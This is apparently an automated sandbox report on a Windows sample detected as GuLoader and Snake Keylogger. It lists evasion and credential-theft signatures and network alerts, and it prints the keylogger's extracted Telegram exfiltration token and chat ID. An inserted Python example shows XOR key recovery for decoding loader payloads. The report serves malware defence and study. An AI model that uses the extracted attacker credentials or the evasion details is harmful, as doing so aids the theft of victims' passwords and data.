
Windows Analysis Report
axN56TZ3PI.exe

Overview

General Information

Sample name: axN56TZ3PI.exe
Analysis ID: 1632315
MD5: 7cb23ee1dedd35c01d1cf539667d4d99
SHA1: 70f8e5fd9d4a78c78eb38e87c5482c763844a6e1
SHA256: 6db4fae76289918ad6c528e7d4d8e36484c2694b6e41775b0a3ccc2499f1b1da

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • axN56TZ3PI.exe (PID: 4624 cmdline: "C:\Users\user\Desktop\axN56TZ3PI.exe" MD5: 7CB23EE1DEDD35C01D1CF539667D4D99)
    • axN56TZ3PI.exe (PID: 8888 cmdline: "C:\Users\user\Desktop\axN56TZ3PI.exe" MD5: 7CB23EE1DEDD35C01D1CF539667D4D99)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XORed.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger with many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Token": "7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME", "Chat_id": "7160883909", "Version": "4.4"}
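The Malpedia description above notes that the GuLoader second stage is XORed. The following is an added example (not code from this report, from Joe Sandbox, or from the malware) of how an analyst recovers a short repeating XOR key from such a blob without knowing it: every PE begins with "MZ" and carries the DOS stub message at offset 0x4E, so XORing the ciphertext with that known plaintext exposes the key stream. It assumes a repeating key no longer than the 39-byte stub message and a standard MSVC DOS stub; the encoded blob it works on is constructed inline, not a real stage-two payload.

```python
"""Recover a repeating XOR key from a XOR-encoded PE and decode it, using the DOS stub
as known plaintext. Added example; not code from the report, Joe Sandbox, or GuLoader.
Assumptions: the key repeats with a period no longer than the 39-byte stub message and
the payload has the standard MSVC DOS stub (message at offset 0x4E). The encoded blob
built below is constructed for the example, not a real second stage."""
from itertools import cycle
from typing import Optional, Tuple

DOS_STUB_OFFSET = 0x4E
DOS_STUB_MSG = b"This program cannot be run in DOS mode."


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; the same call encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key(ciphertext: bytes) -> Optional[bytes]:
    """ciphertext[i] ^ plaintext[i] is the key byte used at offset i. The stub message
    gives a contiguous window of known key stream; the shortest period consistent with
    that window and with "MZ" at offset 0 is returned as the key."""
    window = ciphertext[DOS_STUB_OFFSET:DOS_STUB_OFFSET + len(DOS_STUB_MSG)]
    if len(window) < len(DOS_STUB_MSG):
        return None
    stream = bytes(c ^ p for c, p in zip(window, DOS_STUB_MSG))
    for klen in range(1, len(stream) + 1):
        if any(stream[i] != stream[i + klen] for i in range(len(stream) - klen)):
            continue                          # window is not periodic with this length
        key = bytearray(klen)
        for i in range(klen):                 # map window positions back to key slots
            key[(DOS_STUB_OFFSET + i) % klen] = stream[i]
        if ciphertext[0] ^ key[0] == 0x4D and ciphertext[1] ^ key[1] == 0x5A:  # "MZ"
            return bytes(key)
    return None


def decode_payload(ciphertext: bytes) -> Optional[Tuple[bytes, bytes]]:
    key = recover_key(ciphertext)
    return None if key is None else (key, xor_bytes(ciphertext, key))


def build_sample() -> Tuple[bytes, bytes]:
    """Constructed MZ header + standard DOS stub + filler, XORed with a 5-byte key."""
    header = bytearray(0x40)
    header[0:2] = b"MZ"
    header[0x3C:0x40] = (0x80).to_bytes(4, "little")               # e_lfanew -> PE header
    stub = bytes.fromhex("0E1FBA0E00B409CD21B8014CCD21") + DOS_STUB_MSG + b"\r\r\n$"
    body = bytes(header) + stub
    body += b"\x00" * (0x80 - len(body)) + b"PE\x00\x00" + b"FILLER" * 16
    key = b"\x5a\xc3\x17\x88\x2e"
    return key, xor_bytes(body, key)


if __name__ == "__main__":
    true_key, blob = build_sample()
    key, plain = decode_payload(blob)
    print(f"key={key.hex()} matches={key == true_key} magic={plain[:2]!r} pe={plain[0x80:0x84]!r}")
```

The period search only works because the stub message gives 39 consecutive key-stream bytes; a loader that uses a longer key, or strips the DOS stub before encoding, needs a longer known-plaintext anchor (for example the zero-filled regions of the PE header), which this example does not attempt.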
Source | Rule | Description | Author
--- | --- | --- | ---
0000000C.00000002.6015919161.0000000038091000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
0000000C.00000002.6015919161.00000000381D3000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000000.00000002.2039834509.00000000053C9000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: axN56TZ3PI.exe PID: 8888 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: axN56TZ3PI.exe PID: 8888 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
            No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
--- | --- | --- | --- | --- | --- | --- | --- | ---
2025-03-07T22:28:04.212164+0100 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49725 | 104.21.64.1 | 443 | TCP
2025-03-07T22:28:05.253512+0100 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49726 | 104.21.64.1 | 443 | TCP
2025-03-07T22:28:06.297982+0100 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49727 | 104.21.64.1 | 443 | TCP
2025-03-07T22:28:07.302172+0100 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49728 | 104.21.64.1 | 443 | TCP
2025-03-07T22:28:08.314607+0100 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49729 | 104.21.64.1 | 443 | TCP
2025-03-07T22:28:09.341806+0100 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49730 | 104.21.64.1 | 443 | TCP
2025-03-07T22:28:10.371224+0100 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49731 | 104.21.64.1 | 443 | TCP
2025-03-07T22:28:11.438451+0100 | 2803305 | 3 | Unknown Traffic | 192.168.11.20 | 49732 | 104.21.64.1 | 443 | TCP
2025-03-07T22:28:01.594269+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49723 | 132.226.8.169 | 80 | TCP
2025-03-07T22:28:03.421984+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49723 | 132.226.8.169 | 80 | TCP
2025-03-07T22:28:04.531296+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49723 | 132.226.8.169 | 80 | TCP
2025-03-07T22:28:05.577894+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49723 | 132.226.8.169 | 80 | TCP
2025-03-07T22:28:06.624562+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49723 | 132.226.8.169 | 80 | TCP
2025-03-07T22:28:07.624436+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49723 | 132.226.8.169 | 80 | TCP
2025-03-07T22:28:08.655253+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49723 | 132.226.8.169 | 80 | TCP
2025-03-07T22:28:09.686360+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49723 | 132.226.8.169 | 80 | TCP
2025-03-07T22:28:10.717336+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49723 | 132.226.8.169 | 80 | TCP
2025-03-07T22:27:56.346316+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49721 | 142.251.46.174 | 443 | TCP
2025-03-07T22:28:19.744276+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.11.20 | 49734 | 149.154.167.220 | 443 | TCP
2025-03-07T22:28:12.914209+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.11.20 | 49733 | 149.154.167.220 | 443 | TCP


            AV Detection

Source: axN56TZ3PI.exe | Avira: detected
Source: 0000000C.00000002.6015919161.0000000038091000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7490462916:AAEz89H3J9AylfxjXRLV5diILDx9KkgRSME", "Chat_id": "7160883909", "Version": "4.4"}
Source: axN56TZ3PI.exe | Virustotal: Detection: 65%
Source: axN56TZ3PI.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 12_2_37D7D1D8 CryptUnprotectData | 12_2_37D7D1D8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 12_2_37D7D890 CryptUnprotectData | 12_2_37D7D890
Source: axN56TZ3PI.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.11.20:49724 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 142.251.46.174:443 -> 192.168.11.20:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.250.191.33:443 -> 192.168.11.20:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49733 version: TLS 1.2
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 0_2_0040264F FindFirstFileA | 0_2_0040264F
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 0_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose | 0_2_00405475
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 0_2_00405E9C FindFirstFileA,FindClose | 0_2_00405E9C
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 12_2_0040264F FindFirstFileA | 12_2_0040264F
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 12_2_00405475 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose | 12_2_00405475
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 12_2_00405E9C FindFirstFileA,FindClose | 12_2_00405E9C
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 076AEFBDh | 12_2_076AF00C
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 076AEFBDh | 12_2_076AEE20
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 076AFB7Fh | 12_2_076AF8C8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D70D0Dh | 12_2_37D70B30
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D716F8h | 12_2_37D70B30
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D72941h | 12_2_37D72690
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D73080h | 12_2_37D72C68
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D73080h | 12_2_37D72FAE
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D7FA1Fh | 12_2_37D7F778
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 12_2_37D70673
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then mov esp, ebp | 12_2_37D7F4E1
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 12_2_37D70853
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 12_2_37D70040
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D87437h | 12_2_37D87190
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8B00Fh | 12_2_37D8AD40
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8AA23h | 12_2_37D8A6E8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D86277h | 12_2_37D85FD0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D84867h | 12_2_37D845C0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8189Fh | 12_2_37D815F8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D892A1h | 12_2_37D88FF8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8C2C6h | 12_2_37D8BFF8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8788Fh | 12_2_37D875E8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8E2B6h | 12_2_37D8DFE8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D89C87h | 12_2_37D899E0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8F066h | 12_2_37D8ED98
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8982Fh | 12_2_37D89588
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D82E57h | 12_2_37D82BB0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8D076h | 12_2_37D8CDA8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D81447h | 12_2_37D811A0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D88E47h | 12_2_37D88BA0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D829FFh | 12_2_37D82758
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8DE26h | 12_2_37D8DB58
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D80FEFh | 12_2_37D80D48
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D889EFh | 12_2_37D88748
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8FE16h | 12_2_37D8FB48
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D85E1Fh | 12_2_37D85B78
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8440Fh | 12_2_37D84168
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8BE36h | 12_2_37D8BB68
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8CBE6h | 12_2_37D8C918
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D83FB7h | 12_2_37D83D10
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8EBD6h | 12_2_37D8E908
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D825A7h | 12_2_37D82300
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D859C7h | 12_2_37D85720
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8B9A6h | 12_2_37D8B6D8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8556Fh | 12_2_37D852C8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8D996h | 12_2_37D8D6C8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D80B97h | 12_2_37D808F0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D88597h | 12_2_37D882F0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8073Fh | 12_2_37D80498
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8813Fh | 12_2_37D87E98
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8A537h | 12_2_37D8A290
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8C756h | 12_2_37D8C488
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D83B5Fh | 12_2_37D838B8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8F986h | 12_2_37D8F6B8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8214Fh | 12_2_37D81EA8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D81CF7h | 12_2_37D81A50
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8B516h | 12_2_37D8B248
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D802E7h | 12_2_37D80040
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D87CE7h | 12_2_37D87A40
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8E746h | 12_2_37D8E478
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D85117h | 12_2_37D84E70
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D83707h | 12_2_37D83460
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D84CBFh | 12_2_37D84A18
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D832AFh | 12_2_37D83008
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8A0DFh | 12_2_37D89E38
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8D506h | 12_2_37D8D238
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37D8F4F6h | 12_2_37D8F228
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F664E0h | 12_2_37F661E8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F67800h | 12_2_37F67508
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F610BEh | 12_2_37F60DF0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F68FE8h | 12_2_37F68CF0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F622C6h | 12_2_37F61FF8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6BAF0h | 12_2_37F6B7F8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6D2D8h | 12_2_37F6CFE0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F642B6h | 12_2_37F63FE8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6FDE0h | 12_2_37F6FAE8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6079Eh | 12_2_37F604D0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F67CC8h | 12_2_37F679D0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6A7D0h | 12_2_37F6A4D8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6BFB8h | 12_2_37F6BCC0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F63996h | 12_2_37F636C8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6EAC0h | 12_2_37F6E7C8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F669A8h | 12_2_37F666B0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F65986h | 12_2_37F656B8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F694B0h | 12_2_37F691B8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6AC98h | 12_2_37F6A9A0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F63076h | 12_2_37F62DA8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6D7A0h | 12_2_37F6D4A8
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6EF88h | 12_2_37F6EC90
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F65066h | 12_2_37F64D98
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F68190h | 12_2_37F67E98
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6154Eh | 12_2_37F61280
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F69978h | 12_2_37F69680
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F62756h | 12_2_37F62488
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6C480h | 12_2_37F6C188
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6DC68h | 12_2_37F6D970
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F64747h | 12_2_37F64478
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F66E70h | 12_2_37F66B78
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F60C2Eh | 12_2_37F60960
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F68658h | 12_2_37F68360
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F61E36h | 12_2_37F61B68
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6B160h | 12_2_37F6AE68
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6C948h | 12_2_37F6C650
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F63E26h | 12_2_37F63B58
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6F450h | 12_2_37F6F158
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6030Eh | 12_2_37F60040
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F67338h | 12_2_37F67040
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F65EB7h | 12_2_37F65B48
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F69E40h | 12_2_37F69B48
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6B628h | 12_2_37F6B330
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F63506h | 12_2_37F63238
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6E130h | 12_2_37F6DE38
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6F918h | 12_2_37F6F620
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F654F6h | 12_2_37F65228
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F68B20h | 12_2_37F68828
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F619B7h | 12_2_37F61710
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6A308h | 12_2_37F6A010
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F62BE6h | 12_2_37F62918
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6CE10h | 12_2_37F6CB18
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F6E5F8h | 12_2_37F6E300
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 37F64BD6h | 12_2_37F64908
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 3A3F1B20h | 12_2_3A3F1828
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 3A3F1190h | 12_2_3A3F0E98
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 3A3F0339h | 12_2_3A3F0040
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 3A3F0800h | 12_2_3A3F0508
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 3A3F1658h | 12_2_3A3F1360
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then jmp 3A3F0CC8h | 12_2_3A3F09D0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 12_2_3AAE3F70
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 12_2_3AAE098A
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 12_2_3AAE0AD0
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 12_2_3AAE0A18
Source: C:\Users\user\Desktop\axN56TZ3PI.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 12_2_3AAE3F62
